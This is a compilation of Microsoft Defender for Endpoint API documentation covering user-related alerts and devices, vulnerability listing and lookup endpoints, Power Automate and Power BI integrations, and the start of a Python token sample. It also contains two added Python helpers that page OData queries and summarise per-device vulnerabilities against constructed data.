Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Method | Return Type | Description
List User related alerts | alert collection | List all the alerts that are associated with a user.
List User related devices | machine collection | List all the devices that were logged on by a user.


Get user-related alerts API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of alerts related to a given user ID.

Limitations
Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Alert.Read.All | 'Read all alerts'
Application | Alert.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.Read | 'Read alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'View Data'. For
more information, see Create and manage roles.
The response will include only alerts associated with devices that the user has
access to, based on device group settings (see Create and manage device groups
for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/users/{id}/alerts

The ID is not the full UPN, but only the user name (for example, to retrieve alerts for
user1@contoso.com use /api/users/user1/alerts).

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and user exists - 200 OK. If the user does not exist - 200 OK with an empty
set.

Example

Request
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/users/user1/alerts


Get user-related machines API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of devices related to a given user ID.

Limitations
Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Machine.Read.All | 'Read all machine profiles'
Application | Machine.ReadWrite.All | 'Read and write all machine information'
Delegated (work or school account) | Machine.Read | 'Read machine information'
Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'View Data'. For
more information, see Create and manage roles.
The response will include only devices that the user can access, based on device
group settings. For more information, see Create and manage device groups.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/users/{id}/machines

The ID is not the full UPN, but only the user name (for example, to retrieve machines
for user1@contoso.com use /api/users/user1/machines).

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and user exists - 200 OK with list of machine entities in the body. If user
does not exist - 200 OK with an empty set.

Example

Request
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/users/user1/machines


Vulnerability resource type
Article • 01/31/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Methods

Method | Return Type | Description
Get all vulnerabilities | Vulnerability collection | Retrieves a list of all the vulnerabilities affecting the organization
Get vulnerability by Id | Vulnerability | Retrieves vulnerability information by its Id
List devices by vulnerability | MachineRef collection | Retrieve a list of devices that are associated with the vulnerability Id
List vulnerabilities by machine and software | Vulnerability collection | Retrieves a list of all the vulnerabilities affecting the organization per machine and software.

Properties

Property | Type | Description
Id | String | Vulnerability Id
Name | String | Vulnerability title
Description | String | Vulnerability description
Severity | String | Vulnerability Severity. Possible values are: Low, Medium, High, or Critical
cvssV3 | Double | CVSS v3 score
cvssVector | String | A compressed textual representation that reflects the values used to derive the score
exposedMachines | Long | Number of exposed devices
publishedOn | DateTime | Date when vulnerability was published
updatedOn | DateTime | Date when vulnerability was updated
publicExploit | Boolean | Public exploit exists
exploitVerified | Boolean | Exploit is verified to work
exploitInKit | Boolean | Exploit is part of an exploit kit
exploitTypes | String collection | Exploit effect. Possible values are: Local privilege escalation, Denial of service, or Local
exploitUris | String collection | Exploit source URLs
CveSupportability | String collection | Possible values are: Supported, Not Supported, or SupportedInPremium


List vulnerabilities
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

API description
Retrieves a list of all vulnerabilities.
Supports OData V4 queries.
OData supported operators:
$filter on: id, name, description, cvssV3, publishedOn, severity, and updatedOn
properties.
$top with max value of 8,000.
$skip.

See examples at OData queries with Microsoft Defender for Endpoint.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Vulnerability.Read.All | 'Read Threat and Vulnerability Management vulnerability information'
Delegated (work or school account) | Vulnerability.Read | 'Read Threat and Vulnerability Management vulnerability information'

HTTP request
HTTP

GET /api/vulnerabilities

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with the list of vulnerabilities in the body.

Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/Vulnerabilities

Response example
Here is an example of the response.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Vulnerabilities",
"value": [
{
"id": "CVE-2019-0608",
"name": "CVE-2019-0608",
"description": "A spoofing vulnerability exists when Microsoft
Browsers does not properly parse HTTP content. An attacker who successfully
exploited this vulnerability could impersonate a user request by crafting
HTTP queries. The specially crafted website could either spoof content or
serve as a pivot to chain an attack with other vulnerabilities in web
services.To exploit the vulnerability, the user must click a specially
crafted URL. In an email attack scenario, an attacker could send an email
message containing the specially crafted URL to the user in an attempt to
convince the user to click it.In a web-based attack scenario, an attacker
could host a specially crafted website designed to appear as a legitimate
website to the user. However, the attacker would have no way to force the
user to visit the specially crafted website. The attacker would have to
convince the user to visit the specially crafted website, typically by way
of enticement in an email or instant message, and then convince the user to
interact with content on the website.The update addresses the vulnerability
by correcting how Microsoft Browsers parses HTTP responses.",
"severity": "Medium",
"cvssV3": 4.3,
"cvssVector":
"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C",
"exposedMachines": 4,
"publishedOn": "2019-10-08T00:00:00Z",
"updatedOn": "2019-12-16T16:20:00Z",
"publicExploit": false,
"exploitVerified": false,
"exploitInKit": false,
"exploitTypes": [],
"exploitUris": [],
"CveSupportability": "supported"
}
]
}

See also
Microsoft Defender Vulnerability Management
Vulnerabilities in your organization


List vulnerabilities by machine and
software
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Retrieves a list of all the vulnerabilities affecting the organization per machine and
software.

If the vulnerability has a fixing KB, it will appear in the response.

Supports OData V4 queries.
The OData $filter query is supported on: id, cveId, machineId, fixingKbId,
productName, productVersion, severity, and productVendor properties.
$top with max value of 10,000.
$skip.

Tip
This is a great API for Power BI integration.
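The OData rules above, together with those given earlier for the List software inventory API ($filter on id, name, vendor; $top up to 10,000) and the List vulnerabilities API ($filter on seven properties; $top up to 8,000), are easy to get wrong by hand. The following is an added example, not Microsoft's code: it validates a query against the documented rules before sending it and walks $skip to retrieve every record. The HTTP call is injected as `fetch_page`, and `make_fake_fetch` is a constructed offline stand-in, so nothing here talks to the service.

```python
"""Build and page OData queries for the Defender for Endpoint list endpoints.

Added example, not Microsoft's code. It encodes the rules these pages state
for GET /api/Software, GET /api/vulnerabilities and
GET /api/vulnerabilities/machinesVulnerabilities: which properties $filter
may name and the maximum $top each accepts. The HTTP call is injected
(fetch_page) so the paging loop runs offline against constructed data.
"""
import re
from typing import Callable, Iterator, Optional
from urllib.parse import parse_qs, quote, urlparse

# Filterable properties and $top ceiling, as documented for each endpoint.
ENDPOINT_RULES = {
    "/api/Software": ({"id", "name", "vendor"}, 10_000),
    "/api/vulnerabilities": ({"id", "name", "description", "cvssV3",
                              "publishedOn", "severity", "updatedOn"}, 8_000),
    "/api/vulnerabilities/machinesVulnerabilities": (
        {"id", "cveId", "machineId", "fixingKbId", "productName",
         "productVersion", "severity", "productVendor"}, 10_000),
}
# Regional hosts from the performance tip; "global" is the default API host.
HOSTS = {r: f"api-{r}.securitycenter.microsoft.com" for r in ("us", "eu", "uk", "au")}
HOSTS["global"] = "api.securitycenter.microsoft.com"
ISO_DATETIME = re.compile(r"\d{4}-\d{2}-\d{2}T[\d:.]+Z")


def odata_literal(value) -> str:
    """OData literal: numbers and ISO datetimes bare, booleans lowercase,
    other strings single-quoted with embedded quotes doubled."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, (int, float)):
        return str(value)
    if isinstance(value, str) and ISO_DATETIME.fullmatch(value):
        return value
    return "'" + str(value).replace("'", "''") + "'"


def build_query(endpoint: str, filters: Optional[dict] = None,
                top: Optional[int] = None, skip: int = 0,
                region: str = "global") -> str:
    """Return the full request URL, rejecting an unsupported $filter property
    or a $top above the endpoint's cap before any request is sent.

    filters maps a property to a value (rendered as `prop eq value`) or to an
    (operator, value) tuple such as ("ge", "2019-10-01T00:00:00Z").
    """
    allowed, max_top = ENDPOINT_RULES[endpoint]
    clauses, parts = [], []
    for prop, spec in (filters or {}).items():
        if prop not in allowed:
            raise ValueError(f"{endpoint} does not support $filter on {prop}")
        op, value = spec if isinstance(spec, tuple) else ("eq", spec)
        clauses.append(f"{prop} {op} {odata_literal(value)}")
    if clauses:
        parts.append("$filter=" + quote(" and ".join(clauses), safe="'():,/"))
    if top is not None:
        if top > max_top:
            raise ValueError(f"$top for {endpoint} is capped at {max_top}")
        parts.append(f"$top={top}")
    if skip:
        parts.append(f"$skip={skip}")
    url = f"https://{HOSTS[region]}{endpoint}"
    return url + ("?" + "&".join(parts) if parts else "")


def iterate_all(endpoint: str, fetch_page: Callable[[str], dict],
                page_size: Optional[int] = None, **query) -> Iterator[dict]:
    """Yield every record by advancing $skip in page_size steps (default: the
    endpoint's maximum $top). fetch_page(url) returns the decoded JSON body;
    a page shorter than page_size is the last one."""
    size = page_size or ENDPOINT_RULES[endpoint][1]
    skip = 0
    while True:
        body = fetch_page(build_query(endpoint, top=size, skip=skip, **query))
        records = body.get("value", [])
        yield from records
        if len(records) < size:
            return
        skip += size


def make_fake_fetch(records: list) -> Callable[[str], dict]:
    """Offline stand-in for the HTTP call (constructed, not the real API):
    slices a record list by the $top/$skip values found in the URL."""
    def fetch_page(url: str) -> dict:
        qs = parse_qs(urlparse(url).query)
        top = int(qs.get("$top", [len(records)])[0])
        skip = int(qs.get("$skip", [0])[0])
        return {"value": records[skip:skip + top]}
    return fetch_page


if __name__ == "__main__":
    print(build_query("/api/Software", {"vendor": "microsoft"}, top=10_000))
    demo = [{"id": f"sample-_-{i}"} for i in range(5)]  # constructed records
    print(len(list(iterate_all("/api/Software", make_fake_fetch(demo), page_size=2))))
```

In a real client, `fetch_page` is the function that performs the GET with the Bearer token and decodes the JSON body.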

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Vulnerability.Read.All | 'Read Threat and Vulnerability Management vulnerability information'
Delegated (work or school account) | Vulnerability.Read | 'Read Threat and Vulnerability Management vulnerability information'

HTTP request
HTTP

GET /api/vulnerabilities/machinesVulnerabilities

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with the list of vulnerabilities in the body.
Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/vulnerabilities/machinesVulnerabilities

Response example
Here is an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.PublicAssetVulnerabilityDto)",
    "value": [
        {
            "id": "5afa3afc92a7c63d4b70129e0a6f33f63a427e21-_-CVE-2020-6494-_-microsoft-_-edge_chromium-based-_-81.0.416.77-_-",
            "cveId": "CVE-2020-6494",
            "machineId": "5afa3afc92a7c63d4b70129e0a6f33f63a427e21",
            "fixingKbId": null,
            "productName": "edge_chromium-based",
            "productVendor": "microsoft",
            "productVersion": "81.0.416.77",
            "severity": "Low"
        },
        {
            "id": "7a704e17d1c2977c0e7b665fb18ae6e1fe7f3283-_-CVE-2016-3348-_-microsoft-_-windows_server_2012_r2-_-6.3.9600.19728-_-3185911",
            "cveId": "CVE-2016-3348",
            "machineId": "7a704e17d1c2977c0e7b665fb18ae6e1fe7f3283",
            "fixingKbId": "3185911",
            "productName": "windows_server_2012_r2",
            "productVendor": "microsoft",
            "productVersion": "6.3.9600.19728",
            "severity": "Low"
        },
        ...
    ]
}

See also

Microsoft Defender Vulnerability Management
Vulnerabilities in your organization

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Get vulnerability by ID
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieves vulnerability information by its ID.

Permissions

One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type                      Permission               Permission display name
Application                          Vulnerability.Read.All   'Read Threat and Vulnerability Management vulnerability information'
Delegated (work or school account)   Vulnerability.Read       'Read Threat and Vulnerability Management vulnerability information'

HTTP request

HTTP

GET /api/vulnerabilities/{cveId}

Request headers

Name            Type     Description
Authorization   String   Bearer {token}. Required.

Request body

Empty

Response

If successful, this method returns 200 OK with the vulnerability information in the body.

Example

Request example

Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/Vulnerabilities/CVE-2019-0608

Response example
Here is an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Vulnerabilities/$entity",
    "id": "CVE-2019-0608",
    "name": "CVE-2019-0608",
    "description": "A spoofing vulnerability exists when Microsoft Browsers does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could impersonate a user request by crafting HTTP queries. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.To exploit the vulnerability, the user must click a specially crafted URL. In an email attack scenario, an attacker could send an email message containing the specially crafted URL to the user in an attempt to convince the user to click it.In a web-based attack scenario, an attacker could host a specially crafted website designed to appear as a legitimate website to the user. However, the attacker would have no way to force the user to visit the specially crafted website. The attacker would have to convince the user to visit the specially crafted website, typically by way of enticement in an email or instant message, and then convince the user to interact with content on the website.The update addresses the vulnerability by correcting how Microsoft Browsers parses HTTP responses.",
    "severity": "Medium",
    "cvssV3": 4.3,
    "exposedMachines": 4,
    "publishedOn": "2019-10-08T00:00:00Z",
    "updatedOn": "2019-12-16T16:20:00Z",
    "publicExploit": false,
    "exploitVerified": false,
    "exploitInKit": false,
    "exploitTypes": [],
    "exploitUris": []
}

Related topics

Microsoft Defender Vulnerability Management
Vulnerabilities in your organization

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



List devices by vulnerability
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieves a list of devices affected by a vulnerability.

Permissions

One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type                      Permission               Permission display name
Application                          Vulnerability.Read.All   'Read Threat and Vulnerability Management vulnerability information'
Delegated (work or school account)   Vulnerability.Read       'Read Threat and Vulnerability Management vulnerability information'

HTTP request

HTTP

GET /api/vulnerabilities/{cveId}/machineReferences

Request headers

Name            Type     Description
Authorization   String   Bearer {token}. Required.

Request body

Empty

Response

If successful, this method returns 200 OK with the vulnerability information in the body.

Example

Request example

Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/vulnerabilities/CVE-2019-0608/machineReferences

Response example
Here is an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineReferences",
    "value": [
        {
            "id": "235a2e6278c63fcf85bab9c370396972c58843de",
            "computerDnsName": "h1mkn_PC",
            "osPlatform": "Windows10",
            "rbacGroupName": "GroupTwo"
        },
        {
            "id": "afb3f807d1a185ac66668f493af028385bfca184",
            "computerDnsName": "chat_Desk ",
            "osPlatform": "Windows10",
            "rbacGroupName": "GroupTwo"
        }
        ...
    ]
}
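The machinesVulnerabilities endpoint (with its $filter, $top and $skip options, described in "List vulnerabilities by machine and software" above) and the machineReferences endpoint on this page are easiest to consume behind a small client that pages the results and summarizes them per device. The following Python is an added example, not Microsoft's code: the HTTP transport is injected, the two response pages are constructed from the field values shown in these articles, and all function and constant names are my own.

```python
"""Helpers for the vulnerability endpoints documented above (added example, not
Microsoft's code). The HTTP transport is injected so the paging and triage logic can be
exercised offline against constructed responses shaped like the ones on these pages."""
import json
import re
import urllib.parse
import urllib.request
from collections import defaultdict
from typing import Callable, Dict, Iterable, Iterator, List, Optional

BASE_URL = "https://api.securitycenter.microsoft.com"
TOP_MAX = 10_000                            # $top ceiling stated on the page
CVE_RE = re.compile(r"^CVE-\d{4}-\d{4,}$")
SAFE = "'(),="                              # keep OData literals readable in the URL
SEVERITY_RANK = {"Low": 0, "Medium": 1, "High": 2, "Critical": 3}

Fetcher = Callable[[str], dict]             # url -> decoded JSON body


def http_fetcher(token: str) -> Fetcher:
    """Real transport: authenticated GET, for use against a live tenant."""
    def fetch(url: str) -> dict:
        req = urllib.request.Request(url, headers={"Authorization": "Bearer " + token})
        with urllib.request.urlopen(req) as resp:
            return json.loads(resp.read())
    return fetch


def build_url(path: str, **odata) -> str:
    """BASE_URL + path with the given OData options ($filter, $top, $skip) appended."""
    parts = ["$%s=%s" % (k, urllib.parse.quote(str(v), safe=SAFE))
             for k, v in odata.items() if v is not None]
    return BASE_URL + path + ("?" + "&".join(parts) if parts else "")


def iter_machine_vulnerabilities(fetch: Fetcher, odata_filter: Optional[str] = None,
                                 page_size: int = 1000) -> Iterator[dict]:
    """Page through /machinesVulnerabilities with $top/$skip; stops at the first short page."""
    if not 0 < page_size <= TOP_MAX:
        raise ValueError("$top must be between 1 and %d" % TOP_MAX)
    skip = 0
    while True:
        url = build_url("/api/vulnerabilities/machinesVulnerabilities",
                        filter=odata_filter, top=page_size, skip=skip)
        page = fetch(url).get("value", [])
        yield from page
        if len(page) < page_size:
            return
        skip += page_size


def summarize_by_machine(rows: Iterable[dict]) -> Dict[str, dict]:
    """Per machineId: its CVEs, the KBs that would fix something today, worst severity."""
    out: Dict[str, dict] = defaultdict(lambda: {"cves": [], "fixing_kbs": set(), "worst": "Low"})
    for row in rows:
        m = out[row["machineId"]]
        m["cves"].append(row["cveId"])
        if row.get("fixingKbId"):                 # null means no fixing KB is known yet
            m["fixing_kbs"].add(row["fixingKbId"])
        if SEVERITY_RANK.get(row.get("severity"), 0) > SEVERITY_RANK[m["worst"]]:
            m["worst"] = row["severity"]
    return dict(out)


def devices_for_cve(fetch: Fetcher, cve_id: str) -> List[str]:
    """GET /api/vulnerabilities/{cveId}/machineReferences. The id is validated before it
    goes into the path, so a malformed value cannot change which resource is requested."""
    if not CVE_RE.match(cve_id):
        raise ValueError("not a CVE id: %r" % cve_id)
    body = fetch(build_url("/api/vulnerabilities/%s/machineReferences" % cve_id))
    return [d["computerDnsName"] for d in body.get("value", [])]


# Constructed responses: two pages, field values taken from the examples on these pages.
MACHINE_A = "5afa3afc92a7c63d4b70129e0a6f33f63a427e21"
MACHINE_B = "7a704e17d1c2977c0e7b665fb18ae6e1fe7f3283"
SAMPLE_PAGES = [
    {"value": [
        {"cveId": "CVE-2020-6494", "machineId": MACHINE_A, "fixingKbId": None,
         "productName": "edge_chromium-based", "severity": "Low"},
        {"cveId": "CVE-2016-3348", "machineId": MACHINE_B, "fixingKbId": "3185911",
         "productName": "windows_server_2012_r2", "severity": "Low"},
    ]},
    {"value": [
        {"cveId": "CVE-2019-0608", "machineId": MACHINE_B, "fixingKbId": None,
         "productName": "edge_chromium-based", "severity": "Medium"},
    ]},
]


class FakeFetcher:
    """Offline stand-in for http_fetcher: serves queued pages and records the URLs asked for."""
    def __init__(self, pages: Iterable[dict]):
        self.pages, self.urls = list(pages), []

    def __call__(self, url: str) -> dict:
        self.urls.append(url)
        return self.pages.pop(0) if self.pages else {"value": []}
```

Running `summarize_by_machine(iter_machine_vulnerabilities(FakeFetcher(SAMPLE_PAGES), "productVendor eq 'microsoft'", page_size=2))` walks both constructed pages and reports MACHINE_B at worst severity Medium with one fixing KB available.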

Related topics

Microsoft Defender Vulnerability Management
Vulnerabilities in your organization

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



How to use Power Automate Connector
to set up a Flow for events
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Automating security procedures is a standard requirement for every modern Security
Operations Center (SOC). For SOC teams to operate in the most efficient way,
automation is a must. Use Microsoft Power Automate to help you create automated
workflows and build an end-to-end procedure automation within a few minutes.
Microsoft Power Automate supports different connectors that were built exactly for that.

Use this article to guide you in creating automations that are triggered by an event, such
as when a new alert is created in your tenant. Microsoft Defender API has an official
Power Automate Connector with many capabilities.

Note

For more information about premium connectors licensing prerequisites, see
Licensing for premium connectors.

Usage example
The following example demonstrates how to create a Flow that is triggered anytime a
new Alert occurs on your tenant. You'll be guided on defining what event starts the flow
and what next action will be taken when that trigger occurs.

1. Log in to Microsoft Power Automate.

2. Go to My flows > New > Automated-from blank.

3. Choose a name for your Flow, search for "Microsoft Defender ATP Triggers" as the
trigger, and then select the new Alerts trigger.

Now you have a Flow that is triggered every time a new Alert occurs.

All you need to do now is choose your next steps. For example, you can isolate the
device if the Severity of the Alert is High and send an email about it. The Alert trigger
provides only the Alert ID and the Machine ID. You can use the connector to expand
these entities.

Get the Alert entity using the connector

1. Choose Microsoft Defender ATP for the new step.

2. Choose Alerts - Get single alert API.

3. Set the Alert ID from the last step as Input.

Isolate the device if the Alert's severity is High

1. Add Condition as a new step.

2. Check if the Alert severity is equal to High.

If yes, add the Microsoft Defender ATP - Isolate machine action with the Machine
ID and a comment.

3. Add a new step for emailing about the Alert and the Isolation. There are multiple
email connectors that are easy to use, such as Outlook or Gmail.

4. Save your flow.


You can also create a scheduled flow that runs Advanced Hunting queries and much
more!

Related topic

Microsoft Defender for Endpoint APIs

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Create custom reports using Power BI
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

In this section, you learn to create a Power BI report on top of Defender for Endpoint
APIs.

The first example demonstrates how to connect Power BI to Advanced Hunting API, and
the second example demonstrates a connection to our OData APIs, such as Machine
Actions or Alerts.

Connect Power BI to Advanced Hunting API

1. Open Microsoft Power BI.

2. Select Get Data > Blank Query.

3. Select Advanced Editor.

4. Copy the following and paste it in the editor:

let
    AdvancedHuntingQuery = "DeviceEvents | where ActionType contains 'Anti' | limit 20",

    HuntingUrl = "https://api.securitycenter.microsoft.com/api/advancedqueries",

    Response = Json.Document(Web.Contents(HuntingUrl, [Query=[key=AdvancedHuntingQuery]])),

    TypeMap = #table(
        { "Type", "PowerBiType" },
        {
            { "Double", Double.Type },
            { "Int64", Int64.Type },
            { "Int32", Int32.Type },
            { "Int16", Int16.Type },
            { "UInt64", Number.Type },
            { "UInt32", Number.Type },
            { "UInt16", Number.Type },
            { "Byte", Byte.Type },
            { "Single", Single.Type },
            { "Decimal", Decimal.Type },
            { "TimeSpan", Duration.Type },
            { "DateTime", DateTimeZone.Type },
            { "String", Text.Type },
            { "Boolean", Logical.Type },
            { "SByte", Logical.Type },
            { "Guid", Text.Type }
        }),

    Schema = Table.FromRecords(Response[Schema]),
    TypedSchema = Table.Join(Table.SelectColumns(Schema, {"Name", "Type"}), {"Type"}, TypeMap , {"Type"}),
    Results = Response[Results],
    Rows = Table.FromRecords(Results, Schema[Name]),
    Table = Table.TransformColumnTypes(Rows, Table.ToList(TypedSchema, (c) => {c{0}, c{2}}))

in Table

5. Select Done.

6. Select Edit Credentials.

7. Select Organizational account > Sign in.

8. Enter your credentials and wait to be signed in.

9. Select Connect.

Now the results of your query appear as a table and you can start to build visualizations
on top of it!

You can duplicate this table, rename it, and edit the Advanced Hunting query inside to
get any data you would like.

Connect Power BI to OData APIs

The only difference from the previous example is the query inside the editor. Follow
steps 1-3 above.

At step 4, instead of the code in that example, copy the following code, and paste it in
the editor to pull all Machine Actions from your organization:

let
    Query = "MachineActions",

    Source = OData.Feed("https://api.securitycenter.microsoft.com/api/" & Query, null, [Implementation="2.0", MoreColumns=true])
in
    Source

You can do the same for Alerts and Machines. You can also use OData queries to filter
the results. See Using OData Queries.

Power BI dashboard samples in GitHub

For more information, see the Power BI report templates.

Sample reports

View the Microsoft Defender for Endpoint Power BI report samples. For more
information, see Browse code samples.

Related articles

Defender for Endpoint APIs
Advanced Hunting API
Using OData Queries

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Advanced Hunting using Python
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Run advanced queries using Python. For more information, see Advanced Hunting API.

In this section, we share Python samples to retrieve a token and use it to run a query.

Prerequisite: You first need to create an app.

Get token
Run the following commands:

Python

import json
import urllib.request
import urllib.parse

tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID here
appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app secret here

url = "https://login.microsoftonline.com/%s/oauth2/token" % (tenantId)

resourceAppIdUri = 'https://api.securitycenter.microsoft.com'

body = {
    'resource' : resourceAppIdUri,
    'client_id' : appId,
    'client_secret' : appSecret,
    'grant_type' : 'client_credentials'
}

data = urllib.parse.urlencode(body).encode("utf-8")

